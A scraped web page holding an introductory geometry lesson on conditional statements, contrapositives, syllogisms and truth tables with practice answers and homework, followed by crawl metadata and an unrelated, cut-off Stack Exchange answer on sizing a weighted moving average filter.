[ "SAGE Academy‎ > ‎Resources‎ > ‎STARS® Lessons‎ > ‎\n\n### Lesson 1: Mathematical Thinking and Logic\n\nLesson 1: Mathematical Thinking and Logic\n\nObjectives\n\nBy the end of this lesson, students will be able to:\n\n• decide whether information drawn from a passage is true, false, or cannot be determined\n• recognize the hypothesis and conclusion of a conditional statement\n• state conditionals in the if … then form\n• recognize and state the converse, inverse, and contrapositive of a statement\n• draw correct conclusions from given statements\n\nIntroduction\n\nGeometry is a word taken from the Greeks with \"geo\" meaning earth and \"metron\" meaning measure. In about 300 BC, a Greek mathematician by the name of Euclid wrote a book called The Elements. It was a collection of all the known geometric facts organized in a logical manner. He included basic terms, like point, line, and plane, along with accepted principles called axioms or postulates. Euclid is known as the \"Father of Geometry.\"", null, "In this lesson, you will apply critical thinking and decide whether information drawn from a passage is true, false, or cannot be determined. You will then learn how to recognize the hypothesis and conclusion of a conditional statement and how to state conditionals in the if… then form. Finally, you will learn to recognize and/or state the converse, inverse, and contrapositive of a statement, as well as draw correct conclusions from given statements.\n\nCritical Thinking\n\nThe study of geometry requires one to be a critical thinker. Approaching and solving geometry problems is like a good detective analyzing a crime scene and looking for clues. You must be able to put your information in a clear, logical sequence to show how you arrived at your conclusion.\n\nExample 1\n\nRead the sentence below and determine if the statements that follow are true, false, or cannot be determined.\n\nThe Wilsons boarded a train to evacuate New Orleans two days prior to Hurricane Gustav coming ashore on Monday, September 1, 2008.\n\n Statement Explanation Gustav was a hurricane. True. The hurricane is named in the sentence. The Wilsons boarded the train on Friday. False. Two days before it came ashore would be Saturday, not Friday. The Wilsons' home is in New Orleans. Cannot be determined. The Wilsons could have been visiting the city, so they do not necessarily live there. The Wilsons have at least one child. Cannot be determined. The sentence does not mention how many people are in the Wilson family. The Wilsons left their car in New Orleans. Cannot be determined. Nothing was mentioned about a car.\n\nAs you can see from the example above, a valid conclusion cannot be drawn when you are missing a number of facts.\n\nExample 2\n\nRead the following passage and determine if the statements that follow are true, false, or cannot be determined.\n\nThe Wilsons arrived safely in Baltimore after boarding a train in New Orleans to escape Hurricane Gustav. Aunt Betty was waiting at the station two hours before they arrived. They hugged each other and headed for the parking garage. Soon after, they were in a car on the highway heading towards a good home-cooked meal.\n\n Statement Explanation The Wilsons left New Orleans to escape Hurricane Gustav. True. It is stated in the sentence. Aunt Betty lives in Baltimore. Cannot be determined. Aunt Betty could have driven from another city to Baltimore to pick up the Wilsons. The Wilsons arrived on time. Cannot be determined. The passage does not mention if the train was on time or not. The Wilsons boarded a train in Baltimore. False. Aunt Betty picked them up in her car. The train's final destination was Baltimore. Cannot be determined. The passage does not mention if the train was only making a stop in Baltimore.\n\nPractice\n\nRead the passage below and determine if the statements that follow are true, false, or cannot be determined.\n\nThe second before she opened her mouth, all Thomas could think was, \"If I hear another horrible actor, I'm going to walk out that door.\" She wasn't, thankfully, but it didn't really matter, because he never would've walked out that door, the door in question being the one in the tiny rehearsal room at Harlequin Studios. It was a grungy-looking rehearsal studio, where everything smelled a little funny, like some undiscovered form of mildew. He wouldn't have walked out that door because auditions weren't over yet, and he was a professional, even though he wouldn't be getting paid. Neither would the actors--the more than 160 of them. The woman who was talking was actually pretty good, good enough to get called back. Her name, Skye Benrexi, was interesting enough alone to merit a callback.\n\nUsed with permission from David L. Williams\n\n1. The rehearsal studio is located in New York City.\n\nCannot be determined", null, "Check Your Answer\n\n2. There were more than 160 actors that came to the audition.\n\nTrue", null, "Check Your Answer\n\n3. Thomas was auditioning for a part.\n\nFalse", null, "Check Your Answer\n\n4. Each actor selected would receive a paycheck.\n\nFalse", null, "Check Your Answer\n\n5. Skye Benrexi will be selected for the part.\n\nCannot be determined", null, "Check Your Answer\n\n6. The rehearsal room is located at Harlequin Studios.\n\nTrue", null, "Check Your Answer\n\n7. The rehearsal room was clean and fresh.\n\nFalse", null, "Check Your Answer\n\n8. Skye auditioned well.\n\nTrue", null, "Check Your Answer\n\n9. Thomas was a professional.\n\nTrue", null, "Check Your Answer\n\n10. Skye Benrexi is a stage name.\n\nCannot be determined", null, "Check Your Answer\n\nConditional Statements\n\nLook at the following conditional statement :\n\nThe first clause begins with the word if - \"if the Sun shines.\" This part of the statement is called the hypothesis. The second clause begins with the word then - \"then you will see your shadow.\" This part of the statement is called the conclusion. The if statement is the given information, and the then statement is the conclusion or result of the given information. Conditional statements are used to establish certain conclusions.\n\nIn mathematics, we can label the if statement with the letter p and the then statement with a q. We can show the conditional statement using symbols in a few different ways:\n\nif p, then q\n\np implies q\n\npq\n\nExample 3\n\nIdentify the hypothesis and conclusion in the following statement:\n\nIf I score a 93% on the test, then I will have an A average.\n\nhypothesis: I score a 93% on the test\n\nconclusion: I will have an A average\n\nExample 4\n\nIdentify the hypothesis and conclusion in the following statement:\n\nIf the cows are lying down in the field, then it will rain.\n\nhypothesis: the cows are lying down in the field\n\nconclusion: it will rain\n\nExample 5\n\nIdentify the hypothesis and conclusion in the following statement:\n\nIf x and y are integers, then their product will be an integer.\n\nhypothesis: x and y are integers\n\nconclusion: their product will be an integer\n\nConditional statements are not always written in the if… then form.\n\nExample 6\n\nIdentify the hypothesis and conclusion in the statement below. Rewrite the statement so it is in the form if… then.\n\nWhen it rains, it pours.\n\nhypothesis: it rains\n\nconclusion: it pours\n\nif… then form: If it rains, then it pours.\n\nExample 7\n\nIdentify the hypothesis and conclusion in the statement below. Rewrite the statement so it is in the form if… then.\n\nA banana is soft if it is spoiled.\n\nhypothesis: a banana is spoiled\n\nconclusion: it is soft\n\nif… then form: If a banana is spoiled, then it is soft.\n\nPractice\n\n1-5. Identify the hypothesis and conclusion in the statements below. If a statement is not in the form if… then, rewrite the statement so it is in the form if… then.\n\n1. If the lights are on in the house, then someone is home.\n\nhypothesis: the lights are on in the house\n\nconclusion: someone is home", null, "Check Your Answer\n\n2. You should come inside if you get cold.\n\nif… then form: If you get cold, then you should come inside.\n\nhypothesis: you get cold\n\nconclusion: you should come inside", null, "Check Your Answer\n\n3. If a triangle has two equal sides, then it is an isosceles triangle.\n\nhypothesis: a triangle has two equal sides\n\nconclusion: it is an isosceles triangle", null, "Check Your Answer\n\n4. The early bird gets the worm.\n\nif… then form: If the bird is early, then it gets the worm.\n\nhypothesis: the bird is early\n\nconclusion: it gets the worm", null, "Check Your Answer\n\n5. A straight angle measures 180 degrees.\n\nif… then form: If an angle is a straight angle, then it measures 180 degrees.\n\nhypothesis: an angle is a straight angle\n\nconclusion: it has a measure of 180 degrees", null, "Check Your Answer\n\nEquivalent Statements\n\nThe statement \"A right angle has a measure of 90 degrees\" can be written as a conditional statement:\n\nIf an angle is a right angle, then it has a measure of 90 degrees.\n\nIt is now in the form of \"if p then q.\" If the p and q are reversed, the statement becomes:\n\nIf an angle has a measure of 90 degrees, then it is a right angle.\n\nWhen the p and q are reversed, the converse is formed. The converse of pq is written qp. In this example, both the conditional statement and its converse are true. This is called a biconditional statement. A statement is biconditional if both it and its converse are true. This is not always the case. Look at another conditional statement:\n\nIf you live in Miami, then you live in Florida.\n\nReversing the two parts of the statement gives us the converse:\n\nIf you live in Florida, then you live in Miami.\n\nIn this case the converse is not necessarily true. A person can live in other cities besides Miami and still be in Florida.\n\nIf we want to negate or say the negative of a statement, we use the word not. Once again, look at the conditional statement \"If an angle is a right angle, then it measures 90 degrees.\" To make the negative of this statement, add not to each side:\n\nIf an angle is not a right angle, then it does not measure 90 degrees.\n\nWe use the symbol ~ for the word not. In this case, we can use symbols to describe this statement as ~p → ~q.\n\nWhen you negate both the hypothesis and the conclusion, you have written the inverse. In the example above, both the conditional and its inverse are true, but this is not always the case. Look at the statement about Florida again:\n\nIf you live in Miami, then you live in Florida.\n\nThe inverse of this statement is not necessarily true:\n\nIf you do not live in Miami, then you do not live in Florida.\n\nWe can also take the inverse of the converse of a statement.\n\nConditional statement: If an angle is a right angle, then it measures 90 degrees.\n\nConverse: If an angle measures 90 degrees, then it is a right angle.\n\nTake the inverse of the converse: If an angle does not measure 90 degrees, then it is not a right angle.\n\nThe inverse of a converse is called the contrapositive. For example, the contrapositive of the statement \"If you live in Miami, then you live in Florida\" is the following:\n\nIf you do not live in Florida, then you do not live in Miami.\n\nIn both cases above, note that the contrapositive is true. The contrapositive is always logically equivalent to the conditional statement (in other words, they both have the same meaning).\n\nHere is a way to remember conditionals:", null, "Example 8\n\nAccept the following conditional statement as true:\n\nIf you live in Winchester, then you attend St. Augustus High School.\n\nWrite the converse, inverse, and contrapositive of each statement. Say whether each is true, false, or not necessarily true (cannot be determined), and which if any are logically equivalent.\n\n Converse If you attend St. Augustus High School, then you live in Winchester. Explanation Not necessarily true. The statement does not indicate whether all students at St. Augustus High School live in Winchester. Inverse If you do not live in Winchester, then you do not attend St. Augustus High School. Explanation Not necessarily true. The statement does not indicate whether all students who do not attend St. Augustus High School do not live in Winchester. Contrapositive If you do not attend St. Augustus High School, then you do not live in Winchester. Explanation True. According to the converse, if you attend St. Augustus High School, then you live in Winchester. The conditional and the contrapositive are logically equivalent. If you live in Winchester, then you attend St Augustus High School, so if you do not attend St Augustus High school, then you do not live in Winchester.\n\nPractice\n\n1. Accept the following conditional statement as true:\n\nIf you are on Flight #107, then you are going to Atlanta.\n\nWrite the converse, inverse, and contrapositive of the statement, and say which statements, if any, are logically equivalent.\n\nConverse: If you are going to Atlanta, then you are on Flight #107. (not necessarily true)\nInverse: If you are not on Flight #107, then you are not going to Atlanta. (not necessarily true)\nContrapositive: If you are not going to Atlanta, then you are not on Flight #107. (true)\nThe conditional and the contrapositive are logically equivalent. The converse and inverse are also logically equivalent.", null, "Check Your Answer\n\n2. Identify the relation of each of the following statements to the original statement below:\n\nIf you use a boogie board, then you live along the coast.\n\na) If you do not live along the coast, then you do not use a boogie board.\n\nb) If you live along the coast, then you use a boogie board.\n\nc) If you do not use a boogie board, then you do not live along the coast.\n\na) contrapositive\n\nb) converse\n\nc) inverse", null, "Check Your Answer\n\nDeductive Reasoning\n\nIn presenting a logical argument, one must combine at least three conditional statements in the following form (the symbol for \"therefore\" is ∴ ).\n\npq\n\nqr\n\npr\n\nAbove, if the first two statements (premises) are true, then the third statement (conclusion) must also be true. Notice the hypothesis of one premise is the same as the conclusion of the other premise. This is called a syllogism. If the first and second premises are true, then the final conclusion is also true.\n\nExample 9\n\nIf a student walks to school, he is late for school. If a student is late for school, he misses part of his first class. What conclusion can you reach based on these premises?\n\n p → q If a student walks to school (p), he is late for school (q). q → r If a student is late for school (q), he misses part of his first class (r). ∴ p → r Therefore, a student who walks to school misses part of his first class.\n\nExample 10\n\nIf you live in Tampa, then you live in Hillsborough County. If you live in Hillsborough County, then you live in Florida. What conclusion can you reach based on these premises?\n\n p → q If you live in Tampa (p), then you live in Hillsborough County (q). q → r If you live in Hillsborough County (q), then you live in Florida (r). ∴ p → r Therefore, if you live in Tampa you live in Florida.\n\nPractice\n\n1. Louis lives in the Ninth Ward. The Ninth Ward is in New Orleans. What conclusion can be reached from these premises?\n\nTherefore, Louis lives in New Orleans.", null, "Check Your Answer\n\n2. Determine if the following pairs of premises form a syllogism. If they do, state the conclusion.\n\npq\n\npr\n\nNo (The hypothesis of one is not the conclusion of the other.)", null, "Check Your Answer\n\n3. Determine if the following pairs of premises form a syllogism. If they do, state the conclusion.\n\nqr\n\npq\n\nYes, pr (The order of the premises can be changed, so pq, qr, pr.)", null, "Check Your Answer\n\nMultiple Premises\n\nSometimes there are more than two premises to consider.\n\npq\n\nqr\n\nrs\n\nst\n\npt\n\nThis is what a good detective does when solving a crime. One clue will lead to another. Eventually, when all the pieces fit together in the proper order, the crime is solved. Look at the premises below that lead to a conclusion. Notice the conclusion of one statement is the hypothesis of the next statement.\n\nIf Alvin has \\$80, then he will go shopping.\n\nIf Alvin goes shopping, then he will buy baseball shoes.\n\nIf Alvin buys baseball shoes, then he will try out for the team\n\nIf Alvin tries out for the team, then he will make the team.\n\nTherefore, if Alvin has \\$80, then he will make the baseball team.\n\nSometimes the steps to prove a syllogism are not as obvious as those in the preceding problems. An equivalent statement may need to be written in order to have the conclusion of one premise be the hypothesis of the other. Equivalent statements can be substituted for one another. Recall that the conditional and its contrapositive are equivalent. Look at the examples below of equivalent statements:\n\npq is equivalent to ~q → ~p\n\n~pq is equivalent to ~qp\n\nq → ~p is equivalent to p → ~q\n\nEach of these could be substituted to produce a syllogism that leads to a conclusion.\n\nExample 11\n\nDetermine if the following pairs of premises form a syllogism. If they do, state the conclusion.\n\nc → ~d\n\ned\n\nUse the fact that the contrapositive of c → ~d is d → ~c\n\nRewrite the pair of premises, changing the order and substituting the contrapositive, to find the conclusion.\n\ned\n\nd → ~c\n\ne → ~c\n\nPractice\n\n1. If Peter makes an A in his geometry class, he will spend the summer in the Caribbean. If he goes to the Caribbean, he gets to go to the summer festival. If he goes to the summer festival, he will perform with the band. What conclusion can be drawn from these premises?\n\nTherefore, if Peter makes an A in his geometry class, he will perform with the band at the summer festival in the Caribbean.", null, "Check Your Answer\n\nTruth Tables\n\nEarlier in the lesson you learned how conditional, converse, inverse, and contrapositive statements can be equivalent. Now we are going to verify which ones are equivalent by using a truth table. A truth table shows all the possibilities in a given situation.\n\nIt is raining.\n\nYou get wet.\n\nBoth of these statements can either be true or false. Assign the letter p to the first statement: \"it is raining.\" The second statement, \"you get wet,\" will be the letter q. Now we will put these two statements together as a conditional statement.\n\nIf it is raining, then you get wet.\n\nIn symbolic form this is written:\n\npq\n\nA truth table is a way to display all the possibilities about whether either of those statements are true. It shows the original, converse, inverse, and contrapositive. First look at a truth table for the two parts of the conditional statement above:\n\n p q True True True False False True False False\n\nNotice that there are four possible combinations of true and false for p and q. Now look at the possibilities for the whole statement, pq. (From now on we will use T for true and F for false.) The third column gives what is called the truth value of a statement. The only time that pq is false is when p is true and q is false. In other words, a true first term, or premise, cannot imply a false conclusion.\n\n p q p → q T T T T F F F T T F F T\n\nIn the first case, T → T. If both of the statements--that it is raining and that you get wet --are true statements, then the conditional statement is true. So, the truth value of this is T.\n\nThe second case is T → F. This means that the first statement, it is raining, is true, but the second statement, that you get wet, is not. If this is the case, the conditional statement cannot be true. The truth value here is F, false.\n\nIn the third case, F → T. Here, the first statement is not true, so it is not raining. The second statement, you get wet, is true. In this case, the truth value is T, because we do not have enough information to know that it is false.\n\nIn the fourth case, F → F. In this case, the first and second statements are both false. As with the example above, since we do not have any information about what happens when it is not raining, the statement cannot be proven false. Here, the truth value is T.\n\nNegation\n\nThe symbol for negation (or \"not\") is a tilde (~). If we want to show that a statement p has been negated, we write ~p. The truth table for negation is the following:\n\n p ~p T F F T\n\nNegation causes a true statement to become false and a false one to become true. Say the original statement is \"10 plus 5 equals 15.\" This is true. The negation of this statement is \"10 plus 5 does not equal 15.\" This is false. In another example, the original statement is \"A pig is a horse.\" This is false. The negation of this statement is \"A pig is not a horse.\" This is true.\n\nConjunction\n\nAnother symbol that we use in truth tables is the conjunction or \"and\" symbol. If we want to connect the statements p and q with the word and, we write it as p q.\n\nLook back at the example above. We will connect the statements with a conjunction:\n\nIt is raining and you get wet.\n\np q\n\nThe truth table for conjunctions is the following:\n\n p q p ∧ q T T T T F F F T F F F F\n\nLook at an example. Check to see if the conjunction statement is true based on the truth table:\n\nGreen is a color and 4 + 5 = 9.\n\nLook at the table. Both of these statements are true. Based on the first row of the table, the entire sentence is true.\n\nNow look at a similar statement:\n\nGreen is a color and 4 + 5 = 10.\n\nSince the first statement is true and the second is false, the entire sentence is false.\n\nExample 12\n\nUse the truth table above to state the truth value of the sentence below.\n\nAn apple is a vegetable and 18 - 5 = 13.\n\nThe first statement is false--an apple is not a vegetable.\n\nThe second statement is true.\n\nSince the first statement is false and the second is true, the entire sentence is false.\n\nExample 13\n\nUse the truth table above to state the truth value of the sentence below.\n\nAn apple is a vegetable and 18 - 5 = 10.\n\nThe first statement is false.\n\nThe second statement is also false.\n\nSince the first statement is false and the second is false, the entire sentence is false.\n\nNotice that the only time p q is true is when both p and q are true.\n\nPractice\n\n1 - 4. Determine the truth value of the following sentences.\n\n1. 5 + 7 = 12 and 5 is an even number.\n\nThe first statement is true, but second statement is false. Therefore, the whole sentence is false.", null, "Check Your Answer\n\n2. London is the capital of England and Paris is the capital of France.\n\nThe first statement is true, and the second statement is true. Therefore, the whole sentence is true.", null, "Check Your Answer\n\n3. Eleven is not a prime number and there are five sides in a pentagon.\n\nThe first statement is false, though the second statement is true. Therefore, the whole statement is false.", null, "Check Your Answer\n\n4. The opposite sides of a trapezoid are always equal and there are 350° in a circle.\n\nThe first statement is false and the second statement is false, so the whole statement is false.", null, "Check Your Answer\n\nEquivalent Statements\n\nLook again at the statements we have been using:\n\np: It is raining.\n\nq: You get wet.\n\nWe can use this statement and truth tables to show which statements are equivalent.\n\nA. Conditional statement:\n\nIf it is raining, then you get wet.\n\npq\n\nWe have seen this truth table before.\n\n p q p → q T T T T F F F T T F F T\n\nB. Converse statement:\n\nIf you get wet, then it is raining.\n\nqp\n\nNotice that the p and q have been switched. The truth table looks like the following:\n\n I II III p q q → p T T T T F T F T F F F T\n\nWe have labeled the columns with Roman numerals. In order to get column III, you must do column II → column I. Notice that the results are different from A.\n\nC. Inverse statement:\n\nIf it is not raining, then you do not get wet.\n\n~p → ~q\n\nBecause p and q have been negated, you have to put the negation columns in the truth table. Columns III and IV are used to form column V.\n\n I II III IV V p q ~p ~q ~p → ~q T T F F T T F F T T F T T F F F F T T T\n\nD. Contrapositive statement:\n\nIf you do not get wet, then it is not raining.\n\n~q → ~p\n\nNotice that the p and q have been switched and negated. We must put in the negation columns. In order to get column V, you must do column IV → column III.\n\n I II III IV V p q ~p ~q ~q → ~p T T F F T T F F T F F T T F T F F T T T\n\nNotice that the last column in the conditional (A) and the contrapositive (D) tables are the same. Therefore, we say that they are equivalent statements. Also, the last column in the converse (B) and the inverse (C) tables are the same. Therefore, they are equivalent.\n\nValidity of an Argument\n\nTruth tables can also be used to determine the validity of an argument. An argument consists of premises (hypothesis) and a conclusion. The premises are connected with the word \"and\" (shown with the symbol ).\n\nLook at an example of an argument.\n\n Premises: If the rain stops, I go outside. The rain stops Conclusion: I go outside.\n\nWrite the statements with symbols.\n\np: The rain stops.\nq: I go outside.\n\nPut premises together with the symbol for a conjunction ().\n\n(pq) p\n\nThe conclusion is q. The premises and conclusion are stated as an implied (→) statement.\n\n[(pq) p] → q\n\nLet's build a truth table to look at this statement.\n\n p q p → q p → q ∧ p [p → q ∧ p] → q\n\nNotice that we start with p and q and build from there. The last column is the final statement. Now we will fill in the truth table, using the four possibilities.\n\n I II III IV V p q p → q p → q ∧ p [p → q ∧ p] → q T T T T T T F F F T F T T F T F F T F T\n\nColumn III is formed by using the rules for → (implied).\n\nIII = I → II\n\nColumn IV is formed by using the rules for (and).\n\nIV = III I\n\nColumn V is formed by using the rules for → (implied).\n\nV = IV → II\n\nIn the last column (V), the results are all true. When this happens it is called a tautology, and the argument is valid.\n\nLook at another argument.\n\nIf it is raining, then I am reading.\n\nTherefore, it is raining.\n\np: It is raining.\n\n Premises: p → q q Conclusion: p Argument: [p → q ∧ q] → p\n\nNow set up the truth table:\n\n I II III IV V p q p → q p → q ∧ q [p → q ∧ q] → p T T T T T T F F F T F T T T F F F T F T\n\nColumn III is formed by using the rules for → (implied).\n\nIII = I → II\n\nColumn IV is formed by using the rules for (and).\n\nIV = III II\n\nColumn V is formed by using the rules for → (implied).\n\nV = IV → I\n\nIn the last column (V), the results are not all true. Therefore, the argument is not valid. Here is another argument.\n\nExample 14\n\nConstruct and describe a truth table about the following argument.\n\nIf wool is expensive, then sweaters are expensive.\n\nSweaters are not expensive.\n\nTherefore, wool is not expensive.\n\np: Wool is expensive.\n\nq: Sweaters are expensive\n\n Premises: p → q ~q Conclusion: ~p Argument: [p → q ∧ ~q] → ~p\n\nNotice that there are negations needed here. Add negation columns to the truth table.\n\n I II III IV V VI VII p q ~p ~q p → q p → q ∧ ~q [p → q ∧ ~q] → ~p T T F F T F T T F F T F F T F T T F T F T F F T T T T T\n\nColumns III and IV are formed by negating Columns I and II.\n\nColumn V is formed by using the rules for → (implied).\n\nV = I → II\n\nColumn VI is formed by using the rules for (and).\n\nVI = V IV\n\nColumn VII is formed by using the rules for → (implied).\n\nVII = VI → III\n\nThe last column is all true. Therefore, the argument is valid.\n\nPractice\n\n1. Construct and explain a truth table about the following argument.\n\nIf John does not go to town, then Marty stays home.\n\nJohn goes to town.\n\nTherefore, Marty does not stay home.\n\np: John goes to town.\n\nq: Marty stays home.\n\n Premises: ~p → q p Argument: [(p → q) ∧ ~p] → ~q\n\n I II III IV V VI VII p q ~p ~q ~p → q (~p → q) ∧ p [(~p → q) ∧ p] → ~q T T F F T T F T F F T T T T F T T F T F T F F T T F F T\n\nColumns III and IV are formed by negating Columns I and II\n\nColumn V is formed by using the rules for → (implied).\n\nV = III → II\n\nColumn VI is formed by using the rules for (and).\n\nVI = V I\n\nColumn VII is formed by using the rules for → (implied).\n\nVII = VI → IV\n\nThe last column is not all true. Therefore, the argument is not valid.", null, "Check Your Answer\n\nEnrichment Activity\n\nResearch the history of geometry. There are many resources that contain information on how geometry was first used by the Babylonians, Egyptians, Hindus, Chinese and Greeks. Famous mathematicians such as Euclid, Archimedes, Thales, and Pythagoras were instrumental in the development of geometry. Do some reading on these ancient times and mathematicians, and write a summary of what you have learned. One possible resource is a book titled Great Moments in Mathematics Before 1650 by Howard Eves, published by the Mathematical Association of America.\n\nLesson Review & Homework\n\nWe started this lesson by defining conditional statements, also known as if … then statements. A conditional statement is made up of a hypothesis and a conclusion. Then, we defined converse, inverse, and contrapositive statements. The lesson also covered which of these statements are logically equivalent--that is, they mean the same thing. The converse and inverse statements are equivalent. The conditional and contrapositive are equivalent.\n\nYou used this information when applying deductive reasoning and finding syllogisms, which are used to form a true conclusion from given premises. You learned about truth tables. You also learned how to use them to understand negation, conjunctions, and the validity of arguments. This kind of logical thinking will be the basis for much of the work you will do as you explore geometry.\n\nHomework\n\n1.\n\nIdentify the hypothesis and conclusion of each of the following conditional statements. Rewrite any statement that is not already in the if… then form.\n\na. If the geese are flying south, then winter is on its way.\n\nb. If you study hard, then you will achieve success.\n\nc. The diameter of a circle is 14 inches if the radius of the circle is 7 inches.\n\nd. Those that live in Florida do not have to pay a state income tax.\n\ne. A scalene triangle has no sides of equal length.\n\n2.\n\nIdentify the relation of the following statements to the original statement below:\n\nThe grass will grow if it rains.\n\na. If it doesn't rain, the grass will not grow.\n\nb. If the grass grows, then it rained.\n\n3.\n\nWrite the converse of the statement below. Is it a good definition of what it means for an animal to be extinct? Why or why not?\n\nIf a type of animal is extinct, then there are no animals of that type left on Earth.\n\n4.\n\nDetermine if the following pairs of premises form a syllogism. If they do, state the conclusion.\n\npq\n\nrq\n\n5.\n\nDetermine if the following pairs of premises form a syllogism. If they do, state the conclusion.\n\npq\n\nrp\n\n6.\n\nDetermine if the following pairs of premises form a syllogism. If they do, state the conclusion.\n\nxy\n\nz → ~y\n\n7.\n\nDetermine if the following pairs of premises form a syllogism. If they do, state the conclusion\n\n~r → ~s\n\nst\n\n8.\n\nForm the negation of each statement.\n\na. The sky is cloudy.\n\nb. The Pittsburgh Steelers football team is not the team with the most Super Bowl wins.\n\nc. Josie is the only person with red hair.\n\n9.\n\nLet p and q represent the following simple statements. Write each sentence below in symbolic form.\n\np: This is a cow.\n\nq: This is a mammal.\n\na. If this is a cow, then this is a mammal.\n\nb. If this is a mammal, then this is a cow.\n\nc. If this is not a mammal, then this is not a cow.\n\n10.\n\nLet q and r represent the following simple statements. Write each symbolic statement below in words.\n\nq: It is Memorial Day.\n\nr: There will be fireworks.\n\na. q ~r\n\nb. r → ~q\n\nc. ~r ~q\n\nd. ~q → ~r\n\n11.\n\n11. Use truth tables to show that qp and ~ p → ~ q are equivalent.\n\n12.\n\nBy using a truth table, determine the validity of the following argument:\n\nIf we turn off the TV, there will be less noise.\n\nThere is less noise.\n\nTherefore, we turned off the TV." ]
[ null, "http://secure.starssuite.com/files/geo2010/Geom_L01_fig01.jpg", null, "http://secure.starssuite.com/files/geo2010/checkanswer_arrow.png", null, "http://secure.starssuite.com/files/geo2010/checkanswer_arrow.png", null, "http://secure.starssuite.com/files/geo2010/checkanswer_arrow.png", null, "http://secure.starssuite.com/files/geo2010/checkanswer_arrow.png", null, "http://secure.starssuite.com/files/geo2010/checkanswer_arrow.png", null, "http://secure.starssuite.com/files/geo2010/checkanswer_arrow.png", null, "http://secure.starssuite.com/files/geo2010/checkanswer_arrow.png", null, "http://secure.starssuite.com/files/geo2010/checkanswer_arrow.png", null, "http://secure.starssuite.com/files/geo2010/checkanswer_arrow.png", null, "http://secure.starssuite.com/files/geo2010/checkanswer_arrow.png", null, "http://secure.starssuite.com/files/geo2010/checkanswer_arrow.png", null, "http://secure.starssuite.com/files/geo2010/checkanswer_arrow.png", null, "http://secure.starssuite.com/files/geo2010/checkanswer_arrow.png", null, "http://secure.starssuite.com/files/geo2010/checkanswer_arrow.png", null, "http://secure.starssuite.com/files/geo2010/checkanswer_arrow.png", null, "http://secure.starssuite.com/files/geo2010/Geom_01L_fig02.jpg", null, "http://secure.starssuite.com/files/geo2010/checkanswer_arrow.png", null, "http://secure.starssuite.com/files/geo2010/checkanswer_arrow.png", null, "http://secure.starssuite.com/files/geo2010/checkanswer_arrow.png", null, "http://secure.starssuite.com/files/geo2010/checkanswer_arrow.png", null, "http://secure.starssuite.com/files/geo2010/checkanswer_arrow.png", null, "http://secure.starssuite.com/files/geo2010/checkanswer_arrow.png", null, "http://secure.starssuite.com/files/geo2010/checkanswer_arrow.png", null, "http://secure.starssuite.com/files/geo2010/checkanswer_arrow.png", null, "http://secure.starssuite.com/files/geo2010/checkanswer_arrow.png", null, "http://secure.starssuite.com/files/geo2010/checkanswer_arrow.png", null, "http://secure.starssuite.com/files/geo2010/checkanswer_arrow.png", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.91502285,"math_prob":0.8609669,"size":26828,"snap":"2019-51-2020-05","text_gpt3_token_len":6329,"char_repetition_ratio":0.17517895,"word_repetition_ratio":0.15171026,"special_character_ratio":0.22987178,"punctuation_ratio":0.1309801,"nsfw_num_words":1,"has_unicode_error":false,"math_prob_llama3":0.9744388,"pos_list":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56],"im_url_duplicate_count":[null,1,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,1,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-01-26T03:53:33Z\",\"WARC-Record-ID\":\"<urn:uuid:ed76a02e-a1f2-4688-8bc0-90477bb618f8>\",\"Content-Length\":\"83829\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:19118dc1-0054-45c7-b5e7-4636d87ceb11>\",\"WARC-Concurrent-To\":\"<urn:uuid:d43d51bd-7d3c-4af3-9c8a-9179f48302e6>\",\"WARC-IP-Address\":\"172.217.5.238\",\"WARC-Target-URI\":\"https://sites.google.com/site/geometry4sage20112012/home/resources/star-lessons/lesson-1-mathematical-thinking\",\"WARC-Payload-Digest\":\"sha1:V24GWYDVSZEDFLX35M3RXEWP7XJ7LZID\",\"WARC-Block-Digest\":\"sha1:3AUGSBI3TU4UOOFMHA6YYFHVZVFJOHN2\",\"WARC-Identified-Payload-Type\":\"application/xhtml+xml\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-05/CC-MAIN-2020-05_segments_1579251684146.65_warc_CC-MAIN-20200126013015-20200126043015-00420.warc.gz\"}"}
https://dsp.stackexchange.com/questions/9590/how-to-determine-the-window-size-and-weights-in-weighted-moving-average-wma-g
[ "# How to determine the window size and weights in Weighted Moving Average (WMA), given desired cut-off frequency?\n\nI am trying to smooth my discrete-time data points using the method of WMA.\n\nCurrently, I am using n as the window size and the weight array, {n/(n(n+1)/2), (n-1)/(n(n+1)/2), ... , 1/(n(n+1)/2)}.\n\nIf the y-value of each point is irrelevant, I can just simply randomly choose my size n.\n\nHowever in my case, I hope to reserve the original values of the data points to the best extent. Thus, I cannot choose a big window that averages everything to flat.\n\nMy cut-off freq. is 3Hz and the sampling rate is 50Hz.\n\nHow may I choose the size of the window n?\n\nYour normalized window is given by\n\n$$w(n)=\\frac{2}{N+1}\\frac{N-n}{N},\\quad n=0,1,\\ldots,N-1$$\n\nThe window satisfies\n\n$$\\sum_{n=0}^{N-1}w(n)=1$$\n\nwhich means that the gain of the corresponding moving average filter is 1 at DC.\n\nFor determining the cut-off frequency, we need to compute the frequency response of the window:\n\n$$W(e^{j\\theta})=\\sum_{n=0}^{N-1}w(n)e^{-jn\\theta}$$\n\nAfter some algebra you get\n\n$$W(e^{j\\theta})=\\frac{2}{N+1}\\frac{1-\\frac{N+1}{N}e^{-j\\theta}+\\frac{1}{N}e^{-j(N+1)\\theta}}{(1-e^{-j\\theta})^2}\\tag{1}$$\n\nNow you need to find the value of $N$ for which the magnitude of (1) at the cut-off frequency $\\theta_c=2\\pi\\frac{3Hz}{50Hz}$ becomes $1/\\sqrt{2}$ (-3dB). Since $N$ must be integer you cannot get any desired cut-off frequency, but the given cut-off is approximately achieved by $N=9$, for which $|W(e^{j\\theta_c})|=0.698$ (-3.13dB).\n\n• Thank you so much for the detailed calculation. I made a mistake just now. I have modified my weight array. Could you pls kindly edit your answer according to my updated weight array? I am really new to filter design and thus cannot duplicate ur working process... Thank you! – Sibbs Gambling Jun 14 '13 at 8:43\n• This is exactly the window I assumed you 